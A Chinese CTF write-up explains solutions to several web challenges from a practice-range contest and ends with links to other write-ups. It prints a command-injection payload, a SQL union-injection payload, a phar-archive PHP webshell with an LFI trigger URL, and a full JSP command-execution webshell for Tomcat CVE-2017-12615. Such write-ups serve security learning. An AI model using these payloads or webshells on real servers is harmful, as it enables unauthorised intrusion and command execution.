TSRC靶场赛-writeup

签到

文件上传JS验证，抓包or禁用JS

命令执行基础

啥都没过滤

payload:127.0.0.1|cat ../key.php

你能爆破吗

根据hint，爆破得到用户名admin、密码admin
再根据hint的cookie注入，继续判断字段、爆库、爆表、爆字段，得到flag
中间需要base64编码

成绩查询

union注入，同上

payload：-1' union select 1,2,3,flag from fl4g#

文件包含GetShell

文件上传点只能上传txt，再根据hint文件包含phar，就知道又是很简单的一个题目了，上传一个有后门的phar文件，扩展名改成.txt，然后phar文件包含就好了，连接，得到flag

生成phar文件
<?php$p = new Phar("my.phar", 0, 'my.phar');$p->startBuffering();$p['shell.php'] = '<?php phpinfo(); eval($_POST[x]); ?>';$p->setStub("<?phpPhar::mapPhar('myphar.phar'); __HALT_COMPILER();");$p->stopBuffering();
?>

payload：http://dd5ae31d.yunyansec.com/lfi.php?file=phar://files/JSWOJf0mA0u3Aiyd.txt/shell

小猫咪踩灯泡

根据hint的tomcat远程代码执行（CVE-2017-12615），百度得到了exp，照葫芦画瓢

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();
}%>
<%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{out.println(":-)");
}%>

TSRC靶场赛-writeup相关推荐

3G0众测靶场-0407 WriteUp
0x01 前言昨天参加了3G0众测的题目,一直没来得及更新题目,今天的话看JC师傅整理了一下,我这边也来凑下热闹.内容挺基础,但是对一些CMS类型和框架不熟悉的话,就很容易走偏路,经常看响应包,还有 ...
“蚁景杯”WUSTCTF2021新生赛writeup
"蚁景杯"WUSTCTF2021新生赛writeup Crypto 签到滴答 AES With RSA GMC Vigenere give you d 银河信号 Misc Erx ...
20年9月wust招新赛writeup
20年9月wust招新赛writeup Crypto 黑铁2 黑铁1 青铜3 青铜5 白银5 黄金3 黄金2 Misc 黑铁3 白银3 铂金3 黄金1 铂金2 Web 青铜2 青铜1 白银3 白银2 ...
[完整]首届盘古石杯电子数据取证大赛晋级赛Writeup
首届盘古石电子数据取证大赛晋级赛Writeup 致谢湖南警察学院-雷波(https://mp.weixin.qq.com/s/KyeHWgnfRdR0yUZm9PUYhQ) 浙江警察学院-Zodi4 ...
长安“战疫”网络安全卫士守护赛writeup
长安"战疫"网络安全卫士守护赛writeup misc 八卦迷宫得到flag cazy{zhanchangyangchangzhanyanghechangshanshananzh ...
PWNHUB 五月公开赛+内部赛 writeup（【5月公开赛】MyNotes TemplatePlay 【胖哈勃内部赛｜五月，你好】MockingMail）
PWNHUB 五月公开赛+内部赛 writeup [5月公开赛]MyNotes [5月公开赛]TemplatePlay [胖哈勃内部赛|五月,你好!]MockingMail [胖哈勃内部赛|五月,你好 ...
2020 第三届江西省高校网络安全技能大赛线上赛Writeup
赛题类型 Misc Misc1-Hello Misc2-encrypt Misc3-jump Misc4-Burps Misc5-Trees Misc6-qrcode Misc7-blind Misc ...
2021第四届红帽杯网络安全大赛-线上赛Writeup
文章目录 MISC 签到 colorful code WEB find_it framework WebsiteManger ezlight 记录一下被锤爆的一天-orz MISC 签到签到抢了个二 ...
Dest0g3 520迎新赛 writeup (misc部分 + web部分)
Dest0g3 520迎新赛文章目录 Dest0g3 520迎新赛 MISC Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius Ea ...
2019年第十二届全国大学生信息安全实践创新赛线上赛Writeup
本文章来自https://www.cnblogs.com/iAmSoScArEd/p/10780242.html 未经允许不得转载! 1.MISC-签到下载附件后,看到readme.txt打开后提 ...